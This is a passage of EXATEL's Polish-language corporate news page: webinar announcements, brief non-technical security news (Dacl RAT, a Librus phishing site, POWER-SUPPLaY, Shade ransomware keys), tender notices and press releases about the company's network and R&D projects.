EXATEL zaprasza na bezpłatny cykl webinarów dot. bezpieczeństwa pracy zdalnej. 12 spotkań zostało podzielonych na dwie ścieżki. Pierwsza dedykowana jest dla przedstawicieli samorządu terytorialnego (JST), druga zaś dla biznesu oraz dużych instytucji. W ich trakcie eksperci polskiego operatora telekomunikacyjnego oraz zaproszeni goście przybliżą uczestnikom m.in. z jakimi zagrożeniami wiąże się transformacja cyfrowa, jak zabezpieczyć dane, czym jest monitorowanie sieci czy co zrobić, gdy już organizacja zostanie zaatakowana.

Startujemy 19 i 20 maja

Pierwsze spotkanie odbędzie się już 19 maja o godzinie 10.30. Poprowadzi je Adam Haertle – niezależny ekspert ds. cyberbezpieczeństwa i redaktor naczelny specjalistycznego portalu ZaufanaTrzeciaStrona.pl.

Pełna lista bezpłatnych webinarów o bezpieczeństwie pracy zdalnej dostępna jest tutaj. Zapraszamy do udziału.

Ścieżka dla JST

19.05, godz. 10.30 – Praca zdalna – niebezpieczeństwa czyhające na urzędników 

21.05, godz. 10.30 – Jakie aspekty bezpieczeństwa warto zweryfikować po przyspieszonej transformacji cyfrowej w swojej organizacji 

26.05, godz. 10.30 – Jak chronić Jednostki Samorządu Terytorialnego przed atakami DDoS? 

2.06, godz. 10.30 – Jak zabezpieczać dane podczas pracy zdalnej w sektorze publicznym? 

8.06, godz. 10.30 – Jak ułatwić sobie monitoring bezpieczeństwa sieci – problemy i rozwiązania dla sektora publicznego 

16.06, godz. 10.30 – Zostaliśmy zaatakowani! Przegląd mechanizmów i narzędzi dla sektora publicznego

Ścieżka dla biznesu / instytucji

20.05, godz. 10.30 – Czy praca zdalna jest bezpieczna? Zapewnij swojej firmie maksimum bezpieczeństwa

21.05, godz. 10.30 – Jakie aspekty bezpieczeństwa warto zweryfikować po przyspieszonej transformacji cyfrowej w swojej organizacji

27.05, godz. 10.30 – Jak chronić firmę przed atakami DDoS

3.06, godz. 10.30 – VPN bez tajemnic

9.06, godz. 10.30 – Co zyskasz monitorując sieć firmową?

17.06, godz. 10.30 – Incident Response, czyli jak szybko wykryć i unieszkodliwić zagrożenie

24.06, godz. 10.30 – Rozwiązanie chmurowe dla biznesu – Święty Graal IT czy puszka Pandory?

 

Malware Dacl RAT w wersji dla Mac OS od Grupy Lazarus

W grudniu 2019 roku zostało zidentyfikowane i opisane przez Qihoo 360 NetLab malware Dacl RAT w wersji dla systemów Windows i Linux . Ich stworzenie przypisane zostało północnokoreańskiej grupie Lazarus. Wersja Dacl RAT dla systemu Mac OS została zidentyfikowana przez Threat Intelligence Team Malwarebytes Lab.
Trojan wbudowany został do aplikacji 2FA o nazwie MinaOTP, użytkowanej głównie przez chińskojęzycznych użytkowników. Analogicznie jak wersja dla systemu Linux wyposażona została w wiele funkcjonalności m.in. interpreter poleceń, zarządzanie plikami, skanowanie sieci oraz proxy sieciowe.

Analiza malware DacL RAT

Szczegółowa analiza sposobu wbudowania z aplikację 2FA, budowy wewnętrznej malware oraz wykorzystywanych mechanizmów systemu MAC OS została opublikowana na blogu Threat Intelligence Team Malwarebytes Lab.

Czym jest malware

Malware to ogólna nazwa złośliwego oprogramowania, którego cyberprzestępcy używają do ataków, takich jak zarażania serwerów czy kradzieży danych. Coraz powszechniejszą metodą ataków jest infekowanie stacji roboczych i przejmowanie nad nimi kontroli przez złośliwe oprogramowanie ukryte w plikach przesyłanych pocztą elektroniczną lub na odpowiednio spreparowanych stronach internetowych. Coraz częściej wykorzystuje się też złośliwe oprogramowanie, które powstaje specjalnie na potrzeby konkretnego ataku. Nie jest ono rozpoznawane przez powszechnie stosowane systemy antywirusowe typu IPS/IDS (Intrusion Prevention / Detection System) czy zapory sieciowe (firewall). Skala tego zjawiska jest ogromna – co roku powstaje ponad 140 milionów odmian różnych szkodliwych aplikacji i skryptów. Skutecznymi sposobami ochrony przed tego typu zagrożeniami są rozwiązania antymalware takie jak Fidelis XPS firmy Fidelis Cybersecurity.

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Uwaga na fałszywe strony serwisu Librus

Zgodnie z informacją w serwisie Sekurak.pl CERT Polska 5 maja 2020 ostrzegł o nowej akcji. Tym razem mieliśmy do czynienia z podstawioną stroną bardzo popularnego w szkołach serwisu Librus.

Czym jest serwis Librus

W Librus Synergia użytkownicy mają do dyspozycji rozwiązania takie jak np.: elektroniczny dziennik, plan lekcji, zadania, nieobecności itp. Z racji pandemii COVID-19 w ostatnich tygodniach portal ten zyskał na popularności. Tylko w jeden z ostatnich tygodni serwis zanotował prawie 700 milionów odsłon i plasuje się aż na #12 pozycji w Polsce jeśli chodzi o popularność serwisów www.

Nawet jedna litera ma znaczenie

Normalnie portal udostępniany jest pod adresem: https://portallibrus.pl/ (lub kilkoma innymi). Tymczasem pod złudnie wyglądającą domeną: http://portalibrus[.]pl/(jedna litera “l” mniej), znajduje się serwis, który wykrada loginy oraz hasła.

Sprawdziłem, że 6 maja 2020 roku strona portalibrus.pl nie jest już dostępna w sieci. Obecnie domena ma status „trwa postępowanie wyjaśniające [REGISTERED, ze statusem clientHold/serverHold]”). Jednak wszyscy korzystający z portalu firmy Librus powinni przejrzeć historię logowania czy przypadkiem nie zalogowali się na fałszywej stronie.

W sieci zachowaj ostrożność

Pamiętajcie – podszywanie się pod popularne witryny (takie jak banki, portale społecznościowe itp.) to popularna metoda wyłudzania danych, zwana też jako phishing. Najprostszą i najskuteczniejszą metodą pozostaje zachowanie czujności. Za każdym razem warto sprawdzić, czy strona nie ma żadnej “literówki” w adresie, posiada ważny certyfikat a jej treści nie wzbudzają Twojego niepokoju. Lepiej poświęcić dodatkową minutę na weryfikację, niż stracić cenne dane.

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

POWER-SUPPLaY – nowy sposób kradzieży danych

Mordechai Guri z Cyber Security Research Center na Uniwersytecie Ben Guriona w Izraelu zdołał opracować atak – POWER-SUPPLaY. Za jego pomocą można wykraść dane z komputera korzystając jedynie z zasilacza. Komputer nie musi być podłączony do sieci ani nawet posiadać głośników.

Czym jest POWER-SUPPLaY

Atak ten opiera się na zmianach obciążenia komputera, To z kolei wpływa na częstotliwość przetwornicy w zasilaczu. Jako elementy tworzące fale akustyczną wykorzystywane są kondensatory i transformatory.  Z kolei ultradźwięki odbierane są przez inne urządzenie, np. smartfon i zamieniane na kod dwójkowy.

Atak w praktyce

Metoda ta to swoista ewolucja podatności prezentowanej w czasach monitorów CRT, gdzie wykorzystywano sygnał ulotu elektromagnetycznego wytwarzanego przez układy elektroniczne monitora. Jak wygląda w praktyce najlepiej obrazuje poniższy film.

Ograniczenia ataku POWER_SUPPLaY

Metoda ta jest ograniczona i samo urządzenie, które odsłucha ultradźwięki, musi być umieszczone w pobliżu komputera (nie dalej niż 5 metrów). Kolejnym ograniczeniem jest bardzo mała szybkość transmisji.
Doświadczalnie potwierdzono podatność komputerów biurkowych, serwerów, urządzeń wbudowanych  jak również urządzeń IoT.

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

EXATEL wspiera Wolne Oprogramowanie (Open Source)

  • W ramach projektów badawczo-rozwojowych EXATEL korzysta z rozwiązań Open Source i Free Software, czyli z wolnego oprogramowania.

  • Dotychczas programiści dzielili się swoją wiedzą ze środowiskiem otwartych źródeł poprzez ulepszanie już istniejących rozwiązań.

  • Obecnie firma telekomunikacyjna poszła o krok dalej. Spółka Skarbu Państwa udostępniła pierwszą autorską bibliotekę opracowaną przez programistów EXATEL.

Dziś wiele firm tworzących autorskie rozwiązania korzysta z oprogramowania Open Source. Powodów popularności otwartego oprogramowania jest wiele. Przede wszystkim to liczna społeczność, która na bieżąco pracuje nad ulepszeniami już istniejącego kodu oraz naprawia odkryte w nim błędy czy luki. Dlaczego? Bo ze wspólnej pracy każdy może skorzystać – zarówno osoba prywatna jak i duże przedsiębiorstwo. Bywa nawet tak, że to samo rozwiązanie wykorzystywane jest w konkurencyjnych systemach a nawet stanowi podwaliny technologii całych gałęzi przemysłu. Dziś z rozwiązań Open Source korzysta wiele firm. Wśród nich znajdują się międzynarodowi giganci tacy jak Microsoft, Google, Red Hat (informacje za InfoWorld, 2018) oraz wiele wyspecjalizowanych przedsiębiorstw – takich jak EXATEL.

Czym jest oprogramowanie Open Source

Rozwiązania Open Source (z ang. otwarte źródła) to rodzaj oprogramowania komputerowego, w którym upubliczniony został cały kod źródłowy. Oznacza to, że każdy może dokładnie sprawdzić, jaka jest zasada działania takiego oprogramowania i czy twórca niczego nie zataił. Może to być pracochłonne. Ale, w przeciwieństwie do pracy z rozwiązaniem o zamkniętym kodzie, jest to możliwe.

Wiele rozwiązań Open Source to jednocześnie Free Software (z ang. wolne oprogramowanie). Dzięki odpowiedniej licencji dają one możliwość badania, zmiany i dalszego jego rozpowszechniania wszystkim użytkownikom. Wolne oprogramowanie jest rozwijane przez ogromną, globalną społeczność programistów, architektów, testerów, analityków i wielu innych specjalistów z różnych dziedzin. Co ważne, swój wkład w rozbudowę społeczności mają także firmy komercyjnie. Wnoszą one do zasobów Open Source swoje własne rozwiązania.

Wolne i otwarte oprogramowanie w projektach B+R EXATEL

Już od początku prac programistycznych nad pierwszym projektem badawczo-rozwojowym EXATEL, tj. polskim systemem antyDDoS TAMA, polski operator chętnie korzystał z rozwiązań Open Source. Dotychczas programiści wspierali globalną społeczność tylko poprzez zgłaszane drobne poprawki do publicznego kodu źródłowego.

Publikowanie rozwiązań open source umożliwia rozwój oprogramowania przez osoby z całego świata. Udostępnienie naszej biblioteki to nasz wkład w rozwój tej społeczności. Liczymy także, że wzrośnie zainteresowanie samym rozwiązaniem. To z kolei pozwoli na jakościową weryfikację wytworzonego przez naszych programistów kodu, jego rozwój, optymalizację czy też powstanie nowych mechanizmów tego typu – powiedział Piotr Dudzic, dyrektor Departamentu Informatyki EXATEL, nadzorujący pracę programistów w ramach projektów B+R.

libnetflow9 – biblioteka do dekodowania pakietów danych

Stworzona przez zespół programistów EXATEL biblioteka służy do dekodowania pakietów zgodnych z formatem Netflow9. Dzięki niej możliwe jest szybkie i efektywne pozyskiwanie meta informacji o analizowanym ruchu sieciowym. Kod został napisany w języku C++17 oraz posiada interfejs C API. Szczegółowe informacje oraz sam kod źródłowy dostępny jest na GitHub: https://github.com/exatel/libnetflow9

[AKTUALIZACJA] SDNcore – opracowanie procesu wymagań produkcyjnych

###

AKTUALIZACJA

W związku z pytaniami dotyczącymi “Opracowania procesu projektowania układów elektronicznych oraz technologicznych wymagań produkcyjnych pod kątem zapewnienia integralności elektrycznej dla projektu SDNcore” poniżej publikujemy listę pytań i odpowiedzi.

Odpowiedzi na pytania Oferenta Oferentów – projekt SDNcore (PDF, 1,2Mb)

###

 

SDNcore to kolejny autorski projekt badawczo-rozwojowy w naszej firmie. To będzie całkowicie nowe urządzenie działające zgodnie z filozofią SDN (z ang. Software Defined Networking – sieć definiowana programowo). Dlatego poszukujemy firmy, która wspomoże nas na jednym z etapów budowy tego innowacyjnego rozwiązania.

 

Przedmiot zapytania dla SDNcore

Opracowanie procesu projektowania układów elektronicznych oraz technologicznych wymagań produkcyjnych pod kątem zapewnienia integralności elektrycznej.

 

Dodatkowe informacje

Szczegółowe informacje związane z ogłoszonym konkursem w ramach projektu “SDNcore – wysokowydajna i skalowalna programowalna platforma agregująca ruch sieciowy” znajdują się w zaproszeniu do składania ofert.

 

Termin składa ofert

Czas na składnie ofert upływa 15 maja 2020 roku o godzinie 12.00.

 

Czym jest SDNcore

To urządzenie stworzone z myślą o operatorach sieci telekomunikacyjnych. Będzie ono funkcjonowało w kluczowych punktach sieci transportowej, czyli w warstwach agregacyjnej oraz szkieletowej. Co ważne – będzie współpracować z innymi tego typu rozwiązaniami, takimi jak budowany przez EXATEL SDNbox.

SDNcore tworzymy przede wszystkim, aby szybciej i efektywniej zarządzać siecią transportową i usługami, które na niej świadczymy. Urządzenie SDNcore umożliwi także realizowanie usług telekomunikacyjnych klientom wymagającym dużych przepływności (nawet 100Gb/s). W dłuższej perspektywie umożliwią one nam zastąpienie urządzeń konwencjonalnych na te oparte o technologię SDN. To – w połączeniu z urządzeniami SDNbox – otwiera nam drogę do budowy jednorodnej sieci, której rozwojem będziemy mogli w pełni zarządzać. A to przełoży się na zwiększenie efektywności realizacji naszych usług – powiedział Michał Szczęsny, dyrektor Biura Architektury i Planowania Sieci EXATEL.

Mówiąc o SDNcore nie można pominąć jego roli w nadchodzącej rewolucji 5G. To właśnie typu rozwiązania przesądzą, czy łączność bezprzewodowa piątej generacji szybko pojawi się w codziennym użytku. Więcej informacji o samym projekcie można znaleźć w materiale EXATEL zbuduje SDNcore.

Shade – 750 000 kluczy opublikowanych na GitHub

Twórcy złośliwego oprogramowania ransomware Shade przepraszają ofiary i udostępniają instrukcję oraz elementy niezbędne do zneutralizowania wirusa. Opublikowane klucze deszyfrujące są prawdziwe i rzeczywiście pozwalają zlikwidować złośliwe oprogramowanie zainstalowane na danym urządzeniu. Grupa hakerska publicznie oświadczyła, że zaprzestała swojej działalności.

Shade / Troldesh aktywny od 2014 roku

Wirus Shade (zwany też Troldesh) działa od 2014 roku. W przeciwieństwie do innych rodzajów złośliwego oprogramowania, których celem są między innymi państwa zachodnie, ten przeznaczony do cyberataków wymierzonych w Rosję oraz Ukrainę – donosi Bleeping Computer.

W 2019 roku intensywność działań hakerskich z użyciem Shade uległa znacznemu osłabieniu. Wynika to z faktu, że w tamtym okresie operatorzy wirusa przestali dystrybuować oprogramowanie ransomware. Teraz jego twórcy przepraszają wszystkie ofiary. Udostępniają też wszelkie niezbędne instrukcje oraz elementy potrzebne do skutecznego zlikwidowania Troldesh.

Ponad 750 000 kluczy deszyfrujących na GitHub

Operatorzy oprogramowania ransomware Shade (Troldesh) wydali ponad 750 000 kluczy odszyfrowywania. To ich dawne ofiary mogą używać do odszyfrowywania swoich plików.

Badacze bezpieczeństwa z Kaspersky Lab potwierdzili ważność wycieków kluczy i pracują teraz nad stworzeniem darmowego narzędzia do deszyfrowania.

W krótkim komunikacie opublikowanym w repozytorium GitHub zespół Shade wyjaśnił, co doprowadziło do ich decyzji.

Jesteśmy zespołem, który stworzył trojana-szyfrator znany głównie jako Shade, Troldesh lub Encoder.858. W rzeczywistości zatrzymaliśmy jego dystrybucję pod koniec 2019 roku. Teraz podjęliśmy decyzję o umieszczeniu ostatniego punktu w tej historii i opublikowaniu wszystkich posiadanych kluczy odszyfrowywania (w sumie ponad 750 tysięcy). Publikujemy również nasze oprogramowanie do deszyfrowania; Mamy również nadzieję, że posiadając klucze, firmy antywirusowe wydadzą własne, bardziej przyjazne dla użytkownika narzędzia deszyfrujące. Wszystkie inne dane związane z naszą działalnością (w tym kody źródłowe trojana) zostały nieodwołalnie zniszczone. Przepraszamy wszystkie ofiary trojana i mamy nadzieję, że klucze, które opublikowaliśmy, pomogą im odzyskać swoje dane.

 

Źródła – ZDNet oraz CyberDefence24

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

SDNbox – poszukujemy zewnętrznego audytora

Projekty badawczo-rozwojowe to nie tylko tworzenie nowych produktów. To także zarządzanie projektem oraz zagwarantowanie pełnej jego rozliczalności. Szczególnie, że projekt SDNbox jest współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego (Program Operacyjny Inteligentny Rozwój 2014-2020). Dlatego poszukujemy partnera. Audytora, który wykona dla nas audyt zewnętrzny.

 

Przedmiot zapytania

Audyt zewnętrzny zgodnie z art. 34 ust. 2 ustawy z dnia 30 kwietnia 2010 r. o zasadach finansowania nauki.

 

Dodatkowe informacje

Szczegółowe informacje związane z ogłoszonym konkursem w ramach projektu SDNbox znajdują się w zaproszeniu do składania ofert.

 

Termin składa ofert

Czas na składnie ofert upływa 8 maja 2020 roku o godzinie 12.00.

 

Czym jest SDNbox

Projekt programowalnego urządzenia sieciowego SDNbox to świetny przykład na to, jak demokratyzacja technologii przyczynia się do zwiększenia szans i możliwości rozwijających się instytucji R&D. Dzięki architekturze SDN (ang. Software Defined Networks) możemy stworzyć urządzenie, które funkcjonalnie co najmniej dorównuje urządzeniom światowych producentów, a jednocześnie pozostaje uniwersalne i wielofunkcyjne. W zależności od potrzeb możemy modyfikować funkcje urządzenia, zmieniać jego protokoły i zachowanie.

SDNbox gwarantuje transparentność działania. Dokładnie wiemy, jakie są w nim zaimplementowane funkcje, ponieważ wszystkie są opisane programowo i można je zbadać. Bardzo ważną zaletą jest rownież fakt, że mamy pełną kontrolę nad mechanizmami cyberbepzieczeństwa. Na przykład nad protokołami szyfrowania danych, co jest olbrzymią zaletą dla wszystkich służb zajmujących się bezpieczeństwem państwa. Nieco więcej o SDNbox na stronie projektu.

Utworzenie i prowadzenie rejestru akcjonariuszy

Zapraszamy uprawnione podmioty do składania pisemnych ofert na utworzenie i prowadzenie rejestru akcjonariuszy EXATEL.

 

Rodzaj przetargu

Przetarg pisemny nieograniczony.

 

Przedmiot przetargu

Utworzenie i prowadzenie rejestru akcjonariuszy EXATEL.

 

Szczegółowe informacje

Termin oraz warunki składania ofert znajdują się w załączonym poniżej ogłoszeniu.

Zaproszenie do składania ofert – rejestr akcjonariuszy EXATEL

 

***

EXATEL to polski operator telekomunikacyjny oraz dostawca usług teleinformatycznych (ICT) i cyberbezpieczeństwa. Powstał w 2004 roku w wyniku fuzji spółek Telbank i Tel-Energo. Zbudował i zarządza jedną z największych sieci światłowodowych w Polsce, liczącą ponad 20 500 km. Tworzy rozwiązania dla biznesu, innych operatorów oraz sektora publicznego. Dostarcza transmisję danych we wszystkich polskich bankach komercyjnych i 83 spółkach sektora energetycznego. Zaprojektował i zbudował sieć OST 112 do łączności administracji rządowej. Zarządza połączeniami z 305 operatorami krajowymi i 136 zagranicznymi. Jest obecny w międzynarodowych punktach wymiany ruchu w Londynie, Frankfurcie, Amsterdamie, Moskwie, Kijowie, Pradze i Paryżu. Od 2017 roku należy w pełni do Skarbu Państwa, jest nadzorowany przez Ministra Aktywów Państwowych.

Nowy POP EXATEL w Paryżu

Paryż w zasięgu sieci EXATEL – nowy POP w ofercie operatora

EXATEL otworzył siódmy punkt udostępniania swoich usług poza granicami Polski. POP (ang. point of presence) w Paryżu powiększy przepustowość sieci operatora. To kolejne działanie umacniające pozycję EXATEL jako cyfrowego pomostu, łączącego zachód i wschód Europy.

EXATEL od 2016 roku intensywnie rozbudowuje swoją obecność na rynkach zagranicznych. Do dwóch istniejących europejskich punktów udostępniania usług we Frankfurcie i Amsterdamie dołączyły kolejne: w Londynie, Kijowie, Moskwie i Pradze. Najnowszy punkt został otwarty w Paryżu.

Rynki międzynarodowe od wielu lat są ważnym elementem naszej strategii rozwoju. Przykładem jest obszar hurtu głosu. EXATEL działa na nim właściwie na wszystkich kontynentach, terminując rocznie 3 miliardy minut. Natomiast w transmisji danych, która jest uzależniona od fizycznej infrastruktury, kluczowy jest dla nas rynek europejski. Już dawno temu zrozumieliśmy szansę, płynącą ze strategicznego położenia Polski na mapie Europy. To ogromny potencjał, który wykorzystujemy do dalszego rozwoju firmy. Połączenie wysokiej niezawodności sieci i jakości naszych usług sprawia, że jesteśmy kluczowym partnerem w tej części Europy zarówno dla największych globalnych operatorów, jak i międzynarodowych korporacji – mówi Rafał Magryś, wiceprezes EXATEL odpowiedzialny m.in. za infrastrukturę.

Potwierdza to Maciej Małecki, wiceminister Aktywów Państwowych:

W czasie, gdy szczególnego znaczenia nabiera budowanie pozycji spółek na rynku europejskim trzeba i należy zaznaczać swoją obecność w każdym segmencie rynku. Innowacyjne rozwiązania i konsekwentne działanie w tranzycie ruchu IP potwierdza tę zasadę i otwiera tym samym kolejne możliwości nowoczesnego funkcjonowania w sektorze operatorskim –  dodaje Małecki.

Regionalna dominacja w ruchu IP

Kierunek ekspansji EXATEL to efekt przyjętej w 2016 roku wieloletniej strategii rozwoju firmy. Jednym z głównych jej założeń jest zwiększenie udziałów w sektorze operatorskim (w kraju, jak i za granicą), komercyjnym oraz publicznym. Szczególnie dwa pierwsze potrzebują dużych pojemności, odpowiedniego zasięgu sieci światłowodowej i jej niezawodności. Wszystko po to, by swobodnie przesyłać dane pomiędzy dowolnymi punktami w Europie.

Uruchomienie międzynarodowego punktu styku w Paryżu (France-IX) wynika z potrzeby ekspansji międzynarodowej oraz walki o regionalną dominację w tranzycie ruchu IP. Rozbudowa naszej sieci o punkt w stolicy Francji wynika bezpośrednio z potrzeb naszych klientów. Znacząca część naszego ruchu sieciowego jest kierowana do/z tego kierunku. Uruchomiony punkt pozwoli nam też na zwiększenie globalnej przepustowości całej sieci IP zarządzanej przez EXATEL – mówi Michał Szczęsny, Dyrektor Biura Architektury i Planowania Sieci EXATEL.

Punkty wymiany ruchu internetowego (IXP), do których obecnie przyłączony jest polski operator to: Frankfurt (DE-CIX), Amsterdam (AMS-IX), Londyn (LINX), Moskwa (MSK-IX), Kijów (DTEL-IX), Praga (NIX.CZ) oraz Paryż (France-IX). Rozwój na rynkach zagranicznych spowodował, że wolumen obsługiwanego przez EXATEL ruchu IP wzrósł od 2016 roku o 319%. Firma nie wyklucza rozszerzenia tej listy w najbliższym czasie.

Mapa 1 – działalność EXATEL na świecie

Lokalny operator pierwszego wyboru

Dzięki stale modernizowanej sieci, EXATEL oferuje obecnie najszybszą trasę pomiędzy Frankfurtem i Moskwą. Rosnąca z roku na rok liczba POP-ów sprawia, że z usług narodowego operatora coraz częściej korzystają międzynarodowe banki, giełdy, korporacje czy przedsiębiorstwa, których placówki rozsiane są po całej Europie.

Druga co do wielkości sieć światłowodowa w Polsce i 7 punktów udostępniania usług poza krajem to mocne argumenty do walki o zagraniczne kontrakty. Wśród naszych klientów są prawie wszyscy operatorzy klasy TIER 1. Jeśli dodamy do tego międzynarodowe usługi dla firm takich jak mBank, Oriflame, Comarch, PKO BP, Nordea, Synthos, Telewizja Polska czy instytucji jak Polska Agencja Żeglugi Powietrznej, Ministerstwo Spraw Zagranicznych czy Ministerstwo Obrony Narodowej widać, że to właściwy kierunek rozwoju naszej firmy – dodaje Magryś.

Dziś EXATEL posiada 398 punktów styku z operatorami krajowymi i zagranicznymi. Miesięcznie terminuje ponad 260 milionów minut na rzecz klientów z całego świata. W Polsce firma świadczy usługi telekomunikacyjne nie tylko dla biznesu, innych operatorów czy sektora publicznego. Dostarcza także łączność dla sieci OST112 (niezbędnej dla działania ratownictwa medycznego w Polsce, Policji i Straży Pożarnej), infrastruktury wykorzystywanej przez polski rząd i ministerstwa, kluczowych systemów energetycznych oraz innej infrastruktury krytycznej. Tworzy też autorskie rozwiązania, jak choćby polski anty-DDoS TAMA czy SDNbox. Od 2019 roku świadczy także usługi łączności satelitarnej.

Technopark Pomerania i EXATEL razem w technologię Smart

Dziś Technopark Pomerania oraz EXATEL podpisały list intencyjny o współpracy. Wspólne działania dotyczyć będą budowy i wdrażania inteligentnych rozwiązań. Efektem mają być rozwiązania przygotowane z myślą o miejskiej przestrzeni.

Nie wyobrażamy sobie codziennego życia bez technologii. Dzięki niej oszczędzamy mnóstwo czasu i pieniędzy, wiemy więcej i lepiej radzimy sobie w pracy. Zalety bycia hi-tech zaczynają doceniać również… miasta.

Smart znaczy wspierające mieszkańców

Czym jest Smart City? To miasto, które komunikuje się ze swoimi mieszkańcami. Przykładem technologii Smart City może być oświetlenie samoczynnie włączające się wraz ze zmierzchem, inteligentne kamery informujące dyspozytorów o zagrożeniu, czy światła na skrzyżowaniach dostosowujące się do intensywności ruchu. Innymi słowy – to inteligentne miasto to takie, które aktywnie wspiera swoich mieszkańców.

W Polsce widać rosnącą aktywność władz miejskich w zakresie wdrażania nowoczesnych technologii. Już dziś w Gdańsku kamery pomagają unikać korków, a w Warszawie czujniki stale monitorują jakość powietrza. To tylko promil możliwości, jakie w rzeczywistości daje inteligentne miasto. Dlatego ważne jest, by te rozwiązania dobierać i wdrażać szybko, ale z głową.

Strategia bycia smart

Dziś liderzy światowych rankingów Smart City traktują technologię jako ważny element miejskiego rozwoju. Londyn, Oslo, Berlin – to tylko niektóre przykłady aglomeracji, które mają i wdrażają konkretne technologiczne rozwiązania dla mieszkańców.

Rozwiązania smart są potrzebne. W wielu przypadkach nie zdajemy sobie sprawy z możliwości współczesnych technologii. Dzisiaj często się mówi o smart city 2.0 – wykorzystaniu technologii w miastach. Ale prawdziwe wyzwanie to budowa smart city 3.0 czyli miejsca w którym mieszkańcy są partnerami miasta – mówi Andrzej Feterowski, Prezes Technoparku Pomerania

Podobnego zdania jest także EXATEL.

Może się wydawać, że wdrożenie idei Smart City jest banalnie proste. Z doświadczenia współpracy z innymi miastami wiemy, że tak nie jest. Skoro Smart City ma służyć mieszkańcom, to powinno przede wszystkim uwzględniać ich potrzeby. Trzeba wiedzieć, czym miasto dysponuje i czego realnie potrzebuje. Dlatego bardzo się cieszę, że nasza wiedza i doświadczenie z miast takich jak Rzeszów, Gliwice, Jarosław czy Przemyśl będzie wykorzystana przez Technopark Pomerania – mówi Rafał Magryś, wiceprezes zarządu EXATEL.

Kolejne działania

Podpisanie listu intencyjnego to dopiero początek drogi w kierunku budowy rozwiązań smart city. Równolegle powstaje także zespół roboczy, który ma przygotować konkretny harmonogram działań.

 

***

O Technoparku Pomerania

Technopark Pomerania to park naukowo-technologiczny, który wspiera rozwój innowacyjnych mikro, małych i średnich przedsiębiorstw IT w całym regionie Pomorza Zachodniego. Dodatkowo dba o rozwój przedsiębiorczości, przemysłowe wykorzystanie wiedzy naukowej, a także transfer i komercjalizację nowoczesnych technologii. Park posiada jedno z największych w regionie centrum danych, spełniające najwyższe standardy bezpieczeństwa dla przechowywania i przetwarzania danych cyfrowych. Mieści się w kompleksie czterech biurowców otoczonych zielenią.

 

O EXATEL

EXATEL to polski operator telekomunikacyjny oraz dostawca usług teleinformatycznych (ICT) i cyberbezpieczeństwa. Powstał w 2004 roku w wyniku fuzji spółek Telbank i Tel-Energo. Zbudował i zarządza jedną z największych sieci światłowodowych w Polsce, liczącą ponad 20 000 km. Tworzy rozwiązania dla biznesu, innych operatorów oraz sektora publicznego. Dostarcza transmisję danych we wszystkich polskich bankach komercyjnych i 83 spółkach sektora energetycznego. Zaprojektował i zbudował sieć OST do łączności administracji rządowej. Zarządza połączeniami z 265 operatorami krajowymi i 135 zagranicznymi. Jest obecny w międzynarodowych punktach wymiany ruchu w Londynie, Frankfurcie, Amsterdamie, Moskwie i Kijowie. Od 2017 roku należy w pełni do Skarbu Państwa, jest nadzorowany przez Ministra Obrony Narodowej.

EXATEL zbuduje SDNcore

Do ogłoszonego przez NCBiR programu „Ścieżka dla Mazowsza” zgłoszono 211 projektów. Wśród 56 inicjatyw rekomendowanych do dofinansowania znalazł się równie SDNcore EXATEL. Uzyskał 22 punkty na 25 możliwe. W efekcie polski operator telekomunikacyjny w ciągu 36 miesięcy od podpisania umowy zaprojektuje i zbuduje autorskie urządzenie sieciowe przeznaczone do sieci agregacyjnej i szkieletowej. Wartość całego projektu wynosi 22,8 mln złotych, z czego 14 mln pochodzić będzie z dofinansowania NCBiR.

Przewagą firmy technologicznej są bardziej zaawansowane, tańsze, lepsze i bezpieczniejsze rozwiązania, które może zaoferować klientom. Prowadzone przez nas projekty badawczo-rozwojowe stanowią rozwiązanie konkretnego wyzwania biznesowego. W tym wypadku jest to stale rosnąca liczba użytkowników sieci, która wg raportu Global Digital, w 2019 roku wzrosła o ponad 9% do roku poprzedniego i sięgnęła 4,39 miliarda. Trend ten się utrzymuje. EXATEL jako krajowy operator B2B oraz ważny gracz na rynku tranzytu międzynarodowego musi zapewnić swoim klientom coraz większą pojemność i przepustowość. Są to rozwiązania polskie zwiększające naszą cybersuwerenność.  Dlatego też zdecydowaliśmy się na budowę SDNcore. Kompletujemy w ten sposób ekosystem rozwiązań SDN w naszej sieci – powiedział Rafał Magryś, wiceprezes zarządu EXATEL.

Czym jest SDNcore

To urządzenie stworzone z myślą o operatorach sieci telekomunikacyjnych. Będzie zbudowane zgodnie z filozofią SDN (z ang. Software Defined Networking – sieć definiowana programowo). Urządzenie to będzie funkcjonowało w kluczowych punktach sieci transportowej, czyli w warstwach agregacyjnej oraz szkieletowej. Będzie mogło współpracować z innymi tego typu rozwiązaniami, takimi jak budowany przez EXATEL SDNbox.

SDNcore tworzymy przede wszystkim, aby szybciej i efektywniej zarządzać siecią transportową i usługami, które na niej świadczymy. Urządzenie SDNcore umożliwi także realizowanie usług telekomunikacyjnych klientom wymagającym dużych przepływności (nawet 100Gb/s). W dłuższej perspektywie umożliwią one nam zastąpienie urządzeń konwencjonalnych na te oparte o technologię SDN. To – w połączeniu z urządzeniami SDNbox – otwiera nam drogę do budowy jednorodnej sieci, której rozwojem będziemy mogli w pełni zarządzać. A to przełoży się na zwiększenie efektywności realizacji naszych usług – powiedział Michał Szczęsny, dyrektor Biura Architektury i Planowania Sieci EXATEL.

Elastyczność i bezpieczeństwo

Rozwiązania wykorzystane w SDNcore dadzą szerokie możliwości zarządzania urządzeniami i siecią samą w sobie. W praktyce oznacza to szybką i prostą w realizacji aktualizację zabezpieczeń, wdrożenie nowych protokołów oraz innowacyjnych usług, które będą dostosowane do zmieniających się potrzeb klientów.

Najbezpieczniejsza polska sieć to nie tylko hasło. To konkretne działania, które za nim idą. W ramach tworzonych przez nas innowacji nadzorujemy cały proces produkcji hardware oraz – jako autorzy kodu źródłowego – samo oprogramowanie. To przekłada się na bezpieczeństwo naszych klientów. Szczególnie tych z sektora bankowego, energetycznego, publicznego oraz działających w ramach tzw. infrastruktury krytycznej – dodaje Patryk Biskupski, p.o. dyrektora Biura Zarządzania projektami EXATEL.

Klucz do łączności 5G

